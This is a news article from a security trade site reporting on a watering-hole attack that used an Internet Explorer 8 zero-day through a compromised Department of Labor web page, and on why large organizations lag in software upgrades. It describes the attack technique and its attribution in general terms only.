Cyberattack highlights software update problem in large organizations

A recent cyberattack targeting U.S. government employees working with nuclear weapons illustrates the vulnerability of large organizations that struggle with deploying protective software upgrades.

The attackers, who compromised a Department of Labor website, exploited a previously unknown vulnerability, called a zero-day flaw, in Internet Explorer 8, commonly found on PCs running Windows XP. Javascript injected in the site redirected visitors using IE8 on XP to a malicious website.

In choosing to go after federal agencies, the attackers understood that many government departments are still using outdated versions of Windows and IE, due to the huge expense of upgrading thousands of people to newer versions. Such migrations involve the difficult task of upgrading many other business applications to support the new OS.

"There's a lot of government agencies, and commercial entities as well, that simply cannot upgrade to these latest versions," Eddie Mitchell, security researcher for Invincea, said Monday. "They have internal applications, HR (human resource) applications, payroll applications and such that were designed explicitly to work with Internet Explorer 8, which is why these organizations are still vulnerable."

Researchers agree that the command-and-control (C&C) servers in the latest attack, discovered last week, have attributes similar to those used in previous assaults originating from China.

FireEye reported that the host name of the C&C servers in the latest attack included the phrase "microsoftUpdate," which was also used in attacks over the last six months against the Council on Foreign Relations website and news sites in China visited by Chinese dissidents.

[Also see: Army Corps database on dams compromised]

"I'm not going to be surprised if they are originating from the same group," Zheng Bu, senior director of research for FireEye, said.

FireEye and Invincea have not identified the culprits, but AlienVault reported that the malware is using the same protocol to communicate with the C&C servers as the one used by a Chinese hacking group called Deep Panda. The group is known to attack a variety of U.S. entities, including the high-tech and defense industries and state and federal government agencies.

The pages compromised on the Labor Department site contained information that listed nuclear-related illnesses linked to Department of Energy facilities where employees are developing atomic weapons. Visitors were redirected to the malicious website unknowingly, since there was no obvious change in the browser.

That's accomplished through the use of JavaScript and HTML inline frames. Called iFrames, the technology is embedded in pages to link to malicious sites. IFrames were the most commonly used exploit in Web-based attacks in the second half of last year, according to Microsoft's latest Security Intelligence Report.

Makers of popular exploit kits available in the criminal underground, such as Blackhole and Cool, are expected to incorporate the latest zero-day vulnerability soon, Mitchell said.

"It would not surprise me in the least, based on what we've seen in the past, to see this exploit loaded [in kits] in the next day or two, a week at the most," he said.

Indeed, FireEye reported finding nine other websites besides the Labor Department's redirecting visitors to the same malicious site. Microsoft issued an alert last Friday notifying customers of the vulnerability. The company has not said when it would release a patch.

"We strongly encourage customers to follow the workarounds listed in the advisory while we continue working on a full update to address this issue," said Dustin Childs, group manager for response communications for Microsoft Trustworthy Computing.

Read more about application security in CSOonline's Application Security section.

Join the CSO newsletter!

Error: Please check your email address.

Tags applicationsbrowser securityzero-day attacksAccess control and authenticationsoftwaredata protectionIEsoftware upgradeMicrosoft WindowsData Protection | Application SecurityMicrosoftsecurity

More about FireEyeForeign RelationsMicrosoftPanda

Show Comments

Featured Whitepapers

Editor's Recommendations

Solution Centres

Stories by Antone Gonsalves

Latest Videos

  • 150x50

    CSO Webinar: The Human Factor - Your people are your biggest security weakness

    ​Speakers: David Lacey, Researcher and former CISO Royal Mail David Turner - Global Risk Management Expert Mark Guntrip - Group Manager, Email Protection, Proofpoint

    Play Video

  • 150x50

    CSO Webinar: Current ransomware defences are failing – but machine learning can drive a more proactive solution

    Speakers • Ty Miller, Director, Threat Intelligence • Mark Gregory, Leader, Network Engineering Research Group, RMIT • Jeff Lanza, Retired FBI Agent (USA) • Andy Solterbeck, VP Asia Pacific, Cylance • David Braue, CSO MC/Moderator What to expect: ​Hear from industry experts on the local and global ransomware threat landscape. Explore a new approach to dealing with ransomware using machine-learning techniques and by thinking about the problem in a fundamentally different way. Apply techniques for gathering insight into ransomware behaviour and find out what elements must go into a truly effective ransomware defence. Get a first-hand look at how ransomware actually works in practice, and how machine-learning techniques can pick up on its activities long before your employees do.

    Play Video

  • 150x50

    CSO Webinar: Get real about metadata to avoid a false sense of security

    Speakers: • Anthony Caruana – CSO MC and moderator • Ian Farquhar, Worldwide Virtual Security Team Lead, Gigamon • John Lindsay, Former CTO, iiNet • Skeeve Stevens, Futurist, Future Sumo • David Vaile - Vice chair of APF, Co-Convenor of the Cyberspace Law And Policy Community, UNSW Law Faculty This webinar covers: - A 101 on metadata - what it is and how to use it - Insight into a typical attack, what happens and what we would find when looking into the metadata - How to collect metadata, use this to detect attacks and get greater insight into how you can use this to protect your organisation - Learn how much raw data and metadata to retain and how long for - Get a reality check on how you're using your metadata and if this is enough to secure your organisation

    Play Video

  • 150x50

    CSO Webinar: How banking trojans work and how you can stop them

    CSO Webinar: How banking trojans work and how you can stop them Featuring: • John Baird, Director of Global Technology Production, Deutsche Bank • Samantha Macleod, GM Cyber Security, ME Bank • Sherrod DeGrippo, Director of Emerging Threats, Proofpoint (USA)

    Play Video

  • 150x50

    IDG Live Webinar:The right collaboration strategy will help your business take flight

    Speakers - Mike Harris, Engineering Services Manager, Jetstar - Christopher Johnson, IT Director APAC, 20th Century Fox - Brent Maxwell, Director of Information Systems, THE ICONIC - IDG MC/Moderator Anthony Caruana

    Play Video

More videos

Blog Posts